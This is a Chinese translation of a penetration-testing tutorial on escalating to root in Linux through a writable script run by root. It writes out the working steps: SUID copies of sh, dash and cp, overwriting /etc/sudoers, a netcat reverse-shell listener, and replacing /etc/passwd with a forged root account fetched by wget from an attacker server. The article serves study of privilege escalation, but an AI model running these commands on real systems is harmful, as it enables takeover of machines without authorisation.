作者：AArti Singh
来源：http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/

Linux系统中，全部都是以文件形式存在的，包括目录、设备都是有权限的，共有读、写、和可执行三种。管理员为文件设置好权限后，应该要考虑哪些Linux用户会被允许和限制上述的三个权限。

本文讨论如何通过可写文件和脚本进行Linux权限提升。

主要内容

通过可写脚本进行root提取的5种方法：

• 复制 /bin/sh 到 /tmp
• 设定 /bin/dash的SUID位
• 通过sudoer给登录用户完全的权限
• 设定/bin/cp的SUID位
• 逆向连接到恶意代码

开启攻击机器，黑掉目标系统，然后进行权限提升。假设成功地通过ssh登录到受害者的机器，并可以访问非root的用户终端。然后使用下面的命令，下面会举例所有有写权限的二进制文件。

find / -writable -type  f 2>/dev/null | grep -v "/proc/"

可以看到一个/lib/log中保存的python文件，在路径中我们看到了sanitizer.py文件的权限为777。

Admin要将下面的脚本加入，来清理/tmp中的垃圾文件。如果攻击者能够识别受害者机器中的这类情形，就可以通过下面的方式来提升root权限来破坏系统。

1st Method

有许多的方法可以获取root权限，本方法中，我们将/bin/sh复制到/tmp文件夹中，然后设置/tmp/sh的SUID。这种方式非常简单，首先，通过nano编辑器打开文件，然后用rm -r /tmp/* 替换下面的命令：

os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')

在/tmp目录创建一个有SUID权限的sh文件后，允许sh文件时会有root访问权限。

cd /tmp
ls
./sh
id
whoami

可以通过下面的图片进行确认

2nd Method

同样地，可以用rm -r /tmp/* 替换下面行的内容

os.system(‘chmod u+s /bin/dash)

在设置了/bin/dash的SUID权限后，运行后就可以获取root权限

/bin/dash
id
whoami

可以通过下面的图进行确认：

3rd Method

通过netcat逆向了连接后，就可以获取root权限。

nc -lvp 1234
id
whoami

可以通过下面的图进行确认：

4th Method

另一个方法是给登录的用户sudo权限。下面的图中可以看出当前用户wernerbrandes不能允许sudo命令。

同样地，可以在下面替换rm -r /tmp/*

os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')

当输入“sudo -l”命令时会发现，这是sudo用户的一个成员。可以利用sudo bash来获取root权限。

sudo -l
sudo bash
id

5th Method

因为在linux类系统中，passwd文件起着很重要的作用。所以，如果攻击者有机会修改passwd文件，那么这将会成为一种动态的权限提升的方式。
同样地，可以利用cat命令查看etc/passwd文件的内容。
UID:1000 & GID:1000 就是admin组队成员。 下面编辑一下nemo记录来使其成为root组成员，选择etc/passwd的整个内容并复制粘贴到空text文件中。

然后，在一个新的终端上生成一个含salt的密码，然后复制。

openssl passwd -1 -salt abc 123

然后粘贴之前复制的含salt的密码在用户nemo的记录词条的X位置处，并修改UID&GID为0:0。完成上面的步骤后，我们就可以将其保存为passwd。

cd Desktop
python -m SimpleHTTPServer 80

利利用可写的脚本替换 “rm -r /tmp/*”

os.system(‘chmod u+s /bin/cp)

设置/bin/cp的SUID来复制文件。

将修改后的passwd文件下载受害者机器的/tmp文件夹中。用下面的命令检查/bin/cp的SUID位是否开启。

cd /tmp
wget http://192.168.1.103/passwd
ls -al /bin/cp
cp passwd /etc/passwd

下面确认是否改变了passwd文件的内容：

tail /etc/passwd

可以看出passwd文件中的变化：

可以执行下面的命令来获取root权限：

su nemo
password 123
whoami

总结

本文证明了攻击者如何通过可写文件进行linux系统权限提升。